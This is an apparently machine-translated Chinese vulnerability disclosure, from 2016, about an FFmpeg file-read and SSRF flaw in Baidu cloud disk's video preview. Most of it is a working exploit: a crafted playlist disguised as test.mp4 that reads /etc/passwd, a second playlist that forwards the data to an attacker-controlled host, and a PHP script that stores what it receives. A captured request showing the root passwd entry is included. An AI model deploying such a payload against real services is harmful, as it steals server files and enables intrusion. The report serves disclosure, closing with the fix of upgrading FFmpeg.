漏洞标题 百度云盘文件读取/SSRF 相关制造商 百度 漏洞作者 Noxxx 提交时间 2016-05-05 16: 09 公共时间 2016-06-20 18: 10 漏洞类型 应用配置错误 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 相关链接 https://hackerone.com/reports/115857 https://habrahabr.ru/company/mailru/blog/274855/ FFmpeg问题。在百度云盘上上传test.mp4视频也会影响其他视频应用程序。 打开以阅读文件。 ======== Test.mp4(需要上传到视频的文件) #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0, Concat:http://u-url/exp/movie/header.m3u8 | file: ///etc/passwd #EXT-X-ENDLIST Concat:http://u-url/exp/movie/header.m3u8 |http://baidu.com Header.m3u8(用于细分) #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: http://u-url/exp/movie/comm.php?x= Comm.php(用于接收数据) < PHP File_put_contents(time()。'_ test.txt',$ _GET ['x']); ?> 当您准备将mp4上传到百度磁盘并预览要触发的视频时,您也可以使用ssrf 漏洞证明: 数据
GET/root: x: 0: 0: root:/root:/bin/bash HTTP/1.1 用户代理: Lavf/55.50.100 接受: */* 连接:关闭 修理计划: 升级FFmpeg 版权声明:请注明出处Noxxx @乌云